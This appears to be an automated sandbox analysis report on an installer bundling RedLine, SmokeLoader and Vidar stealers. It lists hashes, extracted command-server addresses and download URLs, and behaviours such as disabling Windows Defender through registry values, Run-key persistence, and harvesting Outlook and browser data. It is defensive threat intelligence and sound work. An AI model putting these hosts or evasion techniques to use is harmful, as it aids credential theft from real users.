Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
13-10-2021 18:35
211013-w8lxmaegdr 1013-10-2021 12:38
211013-pvkdbadhdm 1013-10-2021 05:30
211013-f7nrtsdfa3 1012-10-2021 20:25
211012-y7qwasdbh4 1011-10-2021 21:02
211011-zvywtaabdq 10Analysis
-
max time kernel
1804s -
max time network
1807s -
platform
windows10_x64 -
resource
win10-de-20210920 -
submitted
13-10-2021 05:30
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
3.4MB
-
MD5
26f28bf2dc2b6afc0dd99cb6ea3879b8
-
SHA1
9270b9f48e2d14cc2cbed61ee2e2389d5f69ce05
-
SHA256
5f30eae71c1b0d08e7ec5adfc9a0dc98078595502b60a584a8df5cdf8cacf7fa
-
SHA512
5a350373e87673c9ba39e5353bea1d7c1f2f7bc62a703ed13e892e69037008f3e2accadbdd0ec0bd976e54c68b79dfad6fb37517dd55448cac4d9d74ae8a037b
Malware Config
Extracted
redline
she
135.181.129.119:4805
Extracted
redline
ANI
45.142.215.47:27643
Extracted
redline
media12
91.121.67.60:2151
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Extracted
vidar
41.2
933
https://mas.to/@serg4325
-
profile_id
933
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1108 4968 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8308 4968 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 11132 4968 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
Processes:
resource yara_rule behavioral8/memory/1300-237-0x0000000003560000-0x000000000357F000-memory.dmp family_redline behavioral8/memory/1300-241-0x0000000003660000-0x000000000367D000-memory.dmp family_redline behavioral8/memory/1560-279-0x000000000041B23A-mapping.dmp family_redline behavioral8/memory/3240-278-0x000000000041B236-mapping.dmp family_redline behavioral8/memory/1560-277-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral8/memory/3240-276-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
Registers COM server for autorun 1 TTPs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 3444 created 2008 3444 WerFault.exe Mon206b909958ed4.exe PID 7936 created 940 7936 WerFault.exe FYRPwfX4q40GQUqlzMJ7uuIN.exe -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral8/memory/3540-435-0x00000000007D0000-0x00000000008A6000-memory.dmp family_vidar behavioral8/memory/3540-440-0x0000000000400000-0x00000000004D9000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSC165DCE5\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSC165DCE5\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSC165DCE5\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSC165DCE5\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 47 IoCs
Processes:
mshta.exeMsiExec.exeflow pid process 344 772 mshta.exe 349 772 mshta.exe 561 15124 MsiExec.exe 562 15124 MsiExec.exe 563 15124 MsiExec.exe 564 15124 MsiExec.exe 565 15124 MsiExec.exe 566 15124 MsiExec.exe 567 15124 MsiExec.exe 568 15124 MsiExec.exe 570 15124 MsiExec.exe 571 15124 MsiExec.exe 572 15124 MsiExec.exe 573 15124 MsiExec.exe 574 15124 MsiExec.exe 575 15124 MsiExec.exe 576 15124 MsiExec.exe 577 15124 MsiExec.exe 578 15124 MsiExec.exe 579 15124 MsiExec.exe 580 15124 MsiExec.exe 581 15124 MsiExec.exe 582 15124 MsiExec.exe 583 15124 MsiExec.exe 584 15124 MsiExec.exe 585 15124 MsiExec.exe 586 15124 MsiExec.exe 587 15124 MsiExec.exe 588 15124 MsiExec.exe 589 15124 MsiExec.exe 590 15124 MsiExec.exe 591 15124 MsiExec.exe 592 15124 MsiExec.exe 593 15124 MsiExec.exe 594 15124 MsiExec.exe 595 15124 MsiExec.exe 596 15124 MsiExec.exe 597 15124 MsiExec.exe 598 15124 MsiExec.exe 599 15124 MsiExec.exe 600 15124 MsiExec.exe 601 15124 MsiExec.exe 602 15124 MsiExec.exe 603 15124 MsiExec.exe 604 15124 MsiExec.exe 605 15124 MsiExec.exe 606 15124 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
DYbALA.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeMon204014f13870f5e.exeMon20762bc3f6.exeMon20927aab1e5.exeMon206b909958ed4.exeMon206d48916f93c5.exeMon20d3b8b752.exeMon203f01ac7e6.exeMon2083f8d8970a0b2d.exeMon20b6f9d5bd03a305.exeMon209b3da1556b9a317.exeLzmwAqmV.exe3877687.scr09xU.exELzmwAqmV.exeDownFlSetup110.exeSoft1ww01.exe2961645.scrMon209c830507d573.exeMon20927aab1e5.exe4.exe1261015.scr5221391.scrsetup.exeG_WJY6Q9SNjyFQKaCdNSQGlu.exeChrome 5.exesetup.tmpWinHoster.exe3389934.scrsetup.exe2194961.scrsetup.tmp7298731.scrdkKnHOaMC3V7HQOhUbZyzTBO.exe3EtYdlz4BS4Q34tWZ34_sC7C.exeYQuyJEBXZ9noq8wFtxIcifjm.exea5ccnK2kBlCtiR75sQxNe_I1.exeO9lXeYrvcZsFeuQn9WTBaPjh.exePp65i0I9Y1K24s5W4LIQd_5I.exellCjLXY4R9fHB5q2TyjOChUC.exe6507952.scrFYRPwfX4q40GQUqlzMJ7uuIN.exefyvQdHwzHGYq2Y1YeKRPw2uR.exeaCPcYZ6iFEv51xb_qSWfJfGr.exevDcRvuTFCixtJC75CIreIU92.exe3hfaaFn26tIs9pAVFSAS4oEJ.exeWrQ99Xx0hAs_aCUMzjhze3if.exe3NdneS6adaJJUV_orTDHgDpY.exeSkGivFjV9Ji_kRe4vX2iMLzl.exeu4F75QvnayckUTxJJGcsMTbn.exeYyIud4HFsyGFz5LtvQy2JvHe.exezCfIBmq8BiRxl8l9o8AWVH_j.exe9AfPHFKCRrsSNYDoKcFofsbB.exeQumrVwXKK14FQlUoX6ujeFTg.exeTKYeo1nkvUsdw_M3q5vk8nGH.exe1532832.scrYyIud4HFsyGFz5LtvQy2JvHe.exeservices64.exeWrQ99Xx0hAs_aCUMzjhze3if.exeWrQ99Xx0hAs_aCUMzjhze3if.exeYQuyJEBXZ9noq8wFtxIcifjm.exepid process 1564 setup_installer.exe 2368 setup_install.exe 1444 Mon204014f13870f5e.exe 3936 Mon20762bc3f6.exe 1992 Mon20927aab1e5.exe 2008 Mon206b909958ed4.exe 2944 Mon206d48916f93c5.exe 2696 2708 Mon20d3b8b752.exe 2844 Mon203f01ac7e6.exe 1300 Mon2083f8d8970a0b2d.exe 2676 Mon20b6f9d5bd03a305.exe 2152 Mon209b3da1556b9a317.exe 3840 LzmwAqmV.exe 4052 3877687.scr 1536 09xU.exE 1096 LzmwAqmV.exe 2956 DownFlSetup110.exe 3540 Soft1ww01.exe 3332 2961645.scr 3240 Mon209c830507d573.exe 1560 Mon20927aab1e5.exe 4108 4.exe 4124 1261015.scr 4236 5221391.scr 4336 setup.exe 4636 G_WJY6Q9SNjyFQKaCdNSQGlu.exe 4652 Chrome 5.exe 4932 setup.tmp 5060 WinHoster.exe 1884 3389934.scr 4228 setup.exe 4008 2194961.scr 3548 setup.tmp 1096 LzmwAqmV.exe 3124 7298731.scr 4748 dkKnHOaMC3V7HQOhUbZyzTBO.exe 4744 3EtYdlz4BS4Q34tWZ34_sC7C.exe 5084 YQuyJEBXZ9noq8wFtxIcifjm.exe 3816 a5ccnK2kBlCtiR75sQxNe_I1.exe 4232 O9lXeYrvcZsFeuQn9WTBaPjh.exe 2788 Pp65i0I9Y1K24s5W4LIQd_5I.exe 2524 llCjLXY4R9fHB5q2TyjOChUC.exe 4248 6507952.scr 940 FYRPwfX4q40GQUqlzMJ7uuIN.exe 4216 fyvQdHwzHGYq2Y1YeKRPw2uR.exe 4292 aCPcYZ6iFEv51xb_qSWfJfGr.exe 1880 vDcRvuTFCixtJC75CIreIU92.exe 5044 3hfaaFn26tIs9pAVFSAS4oEJ.exe 4440 WrQ99Xx0hAs_aCUMzjhze3if.exe 3912 3NdneS6adaJJUV_orTDHgDpY.exe 4956 SkGivFjV9Ji_kRe4vX2iMLzl.exe 3232 u4F75QvnayckUTxJJGcsMTbn.exe 4004 YyIud4HFsyGFz5LtvQy2JvHe.exe 1220 zCfIBmq8BiRxl8l9o8AWVH_j.exe 5188 9AfPHFKCRrsSNYDoKcFofsbB.exe 5404 QumrVwXKK14FQlUoX6ujeFTg.exe 5464 TKYeo1nkvUsdw_M3q5vk8nGH.exe 5596 1532832.scr 5688 YyIud4HFsyGFz5LtvQy2JvHe.exe 5760 services64.exe 5436 WrQ99Xx0hAs_aCUMzjhze3if.exe 5580 WrQ99Xx0hAs_aCUMzjhze3if.exe 5264 YQuyJEBXZ9noq8wFtxIcifjm.exe -
Checks BIOS information in registry 2 TTPs 32 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
3237477.scr3883540.scrPp65i0I9Y1K24s5W4LIQd_5I.exefyvQdHwzHGYq2Y1YeKRPw2uR.exellCjLXY4R9fHB5q2TyjOChUC.exe2961645.scra5ccnK2kBlCtiR75sQxNe_I1.exe3EtYdlz4BS4Q34tWZ34_sC7C.exeQumrVwXKK14FQlUoX6ujeFTg.exe2194961.scr6984721.scr4062075.scr7298731.scrvDcRvuTFCixtJC75CIreIU92.exeaCPcYZ6iFEv51xb_qSWfJfGr.exeSkGivFjV9Ji_kRe4vX2iMLzl.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3237477.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3883540.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Pp65i0I9Y1K24s5W4LIQd_5I.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fyvQdHwzHGYq2Y1YeKRPw2uR.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion llCjLXY4R9fHB5q2TyjOChUC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2961645.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a5ccnK2kBlCtiR75sQxNe_I1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a5ccnK2kBlCtiR75sQxNe_I1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3EtYdlz4BS4Q34tWZ34_sC7C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion QumrVwXKK14FQlUoX6ujeFTg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion llCjLXY4R9fHB5q2TyjOChUC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3237477.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2961645.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2194961.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fyvQdHwzHGYq2Y1YeKRPw2uR.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6984721.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4062075.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7298731.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion vDcRvuTFCixtJC75CIreIU92.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion aCPcYZ6iFEv51xb_qSWfJfGr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion QumrVwXKK14FQlUoX6ujeFTg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3EtYdlz4BS4Q34tWZ34_sC7C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion SkGivFjV9Ji_kRe4vX2iMLzl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion aCPcYZ6iFEv51xb_qSWfJfGr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6984721.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7298731.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SkGivFjV9Ji_kRe4vX2iMLzl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3883540.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4062075.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2194961.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Pp65i0I9Y1K24s5W4LIQd_5I.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion vDcRvuTFCixtJC75CIreIU92.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
DYbALA.exepCIIGQzx0Vl5ZrGPNJ9TmobG.exePebyjorewe.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation DYbALA.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation pCIIGQzx0Vl5ZrGPNJ9TmobG.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Pebyjorewe.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exesetup.tmprundll32.exesetup.tmpApplicationFrameHost.exerundll32.exepowershell.exemshta.exeTUbeQkaNXlmCO1P4yBR44pex.tmpinstaller.exemsiexec.exeautosubplayer.exeMsiExec.exepowershell.exe9AfPHFKCRrsSNYDoKcFofsbB.exerundll32.exeMsiExec.exeMsiExec.exepid process 2368 setup_install.exe 2368 setup_install.exe 2368 setup_install.exe 2368 setup_install.exe 2368 setup_install.exe 2368 setup_install.exe 2368 setup_install.exe 4932 setup.tmp 1784 rundll32.exe 3548 setup.tmp 4528 ApplicationFrameHost.exe 896 rundll32.exe 896 rundll32.exe 1640 powershell.exe 1640 powershell.exe 772 mshta.exe 6692 TUbeQkaNXlmCO1P4yBR44pex.tmp 772 mshta.exe 772 mshta.exe 772 mshta.exe 772 mshta.exe 14452 installer.exe 14452 installer.exe 14488 msiexec.exe 14488 msiexec.exe 8156 autosubplayer.exe 14452 installer.exe 8156 autosubplayer.exe 6664 MsiExec.exe 8340 powershell.exe 6664 MsiExec.exe 5188 9AfPHFKCRrsSNYDoKcFofsbB.exe 5188 9AfPHFKCRrsSNYDoKcFofsbB.exe 5188 9AfPHFKCRrsSNYDoKcFofsbB.exe 5188 9AfPHFKCRrsSNYDoKcFofsbB.exe 5188 9AfPHFKCRrsSNYDoKcFofsbB.exe 11152 rundll32.exe 8156 autosubplayer.exe 8156 autosubplayer.exe 8156 autosubplayer.exe 8156 autosubplayer.exe 15124 MsiExec.exe 15124 MsiExec.exe 15124 MsiExec.exe 15124 MsiExec.exe 15124 MsiExec.exe 15124 MsiExec.exe 15124 MsiExec.exe 8156 autosubplayer.exe 8156 autosubplayer.exe 8156 autosubplayer.exe 8156 autosubplayer.exe 15124 MsiExec.exe 15124 MsiExec.exe 15124 MsiExec.exe 14452 installer.exe 15124 MsiExec.exe 15124 MsiExec.exe 9648 MsiExec.exe 9648 MsiExec.exe 9648 MsiExec.exe 9648 MsiExec.exe 9648 MsiExec.exe 9648 MsiExec.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\2961645.scr themida C:\Users\Admin\AppData\Roaming\2961645.scr themida -
Processes:
O9lXeYrvcZsFeuQn9WTBaPjh.exerundll32.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" O9lXeYrvcZsFeuQn9WTBaPjh.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet O9lXeYrvcZsFeuQn9WTBaPjh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" O9lXeYrvcZsFeuQn9WTBaPjh.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features O9lXeYrvcZsFeuQn9WTBaPjh.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths O9lXeYrvcZsFeuQn9WTBaPjh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\Adobe Films\O9lXeYrvcZsFeuQn9WTBaPjh.exe = "0" O9lXeYrvcZsFeuQn9WTBaPjh.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection O9lXeYrvcZsFeuQn9WTBaPjh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AqDFSDlmWiui = "0" rundll32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0" rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions O9lXeYrvcZsFeuQn9WTBaPjh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" O9lXeYrvcZsFeuQn9WTBaPjh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" O9lXeYrvcZsFeuQn9WTBaPjh.exe -
Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs
Processes:
mshta.exe9AfPHFKCRrsSNYDoKcFofsbB.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts mshta.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts 9AfPHFKCRrsSNYDoKcFofsbB.exe -
Accesses Microsoft Outlook profiles 1 TTPs 16 IoCs
Processes:
9AfPHFKCRrsSNYDoKcFofsbB.exemshta.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook 9AfPHFKCRrsSNYDoKcFofsbB.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook 9AfPHFKCRrsSNYDoKcFofsbB.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook mshta.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 9AfPHFKCRrsSNYDoKcFofsbB.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook 9AfPHFKCRrsSNYDoKcFofsbB.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook 9AfPHFKCRrsSNYDoKcFofsbB.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook 9AfPHFKCRrsSNYDoKcFofsbB.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook mshta.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook mshta.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook mshta.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook mshta.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook 9AfPHFKCRrsSNYDoKcFofsbB.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook mshta.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook mshta.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook mshta.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook 9AfPHFKCRrsSNYDoKcFofsbB.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
1261015.scrDYbALA.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 1261015.scr Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\PowerControl\\Midusutaego.exe\"" DYbALA.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
2194961.scr7298731.scr3883540.scr6984721.scr2961645.scra5ccnK2kBlCtiR75sQxNe_I1.exevDcRvuTFCixtJC75CIreIU92.exeSkGivFjV9Ji_kRe4vX2iMLzl.exeO9lXeYrvcZsFeuQn9WTBaPjh.exe3EtYdlz4BS4Q34tWZ34_sC7C.exePp65i0I9Y1K24s5W4LIQd_5I.exellCjLXY4R9fHB5q2TyjOChUC.exeaCPcYZ6iFEv51xb_qSWfJfGr.exevd_vJluR5myaUwQqLRcm40FW.exefyvQdHwzHGYq2Y1YeKRPw2uR.exeQumrVwXKK14FQlUoX6ujeFTg.exe3237477.scr4062075.scrdescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2194961.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7298731.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3883540.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6984721.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2961645.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA a5ccnK2kBlCtiR75sQxNe_I1.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA vDcRvuTFCixtJC75CIreIU92.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SkGivFjV9Ji_kRe4vX2iMLzl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" O9lXeYrvcZsFeuQn9WTBaPjh.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3EtYdlz4BS4Q34tWZ34_sC7C.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Pp65i0I9Y1K24s5W4LIQd_5I.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA llCjLXY4R9fHB5q2TyjOChUC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA aCPcYZ6iFEv51xb_qSWfJfGr.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA vd_vJluR5myaUwQqLRcm40FW.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA fyvQdHwzHGYq2Y1YeKRPw2uR.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA QumrVwXKK14FQlUoX6ujeFTg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA O9lXeYrvcZsFeuQn9WTBaPjh.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3237477.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4062075.scr -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
installer.exemsiexec.exedescription ioc process File opened (read-only) \??\F: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) 